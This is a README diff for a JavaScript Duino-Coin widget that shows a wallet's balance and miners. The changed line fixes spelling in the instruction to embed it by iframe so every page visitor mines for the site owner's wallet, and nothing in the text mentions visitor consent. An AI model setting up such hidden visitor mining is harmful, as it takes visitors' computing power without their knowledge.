frnck37/Duino-JS-website-agregator-/README.md

 - Navigate to "http://yourserver.com/duinocoin", and you should see a widget showing your DUCO username, your DUCO balance, the active miners working for you, the value of your wallet in TRON (TRX) and an approximation of its value in $.

--You can simply use this widget by placing an <iframe> tag pointing to its adress anywhere in your html, and every visitor of this page will the becomme a miner of your DUCO wallet, and make you rich ! (maybe...)
+-You can simply use this widget by placing an <iframe> tag pointing to its adress anywhere in your html, and every visitor of this page will then become a miner of your DUCO wallet, and make you rich ! (maybe...)

 Or you can use the html to modify it to your needs and place it directly in your website where you want it, by including its initialization parameters :
 "    <div id="duco-widget">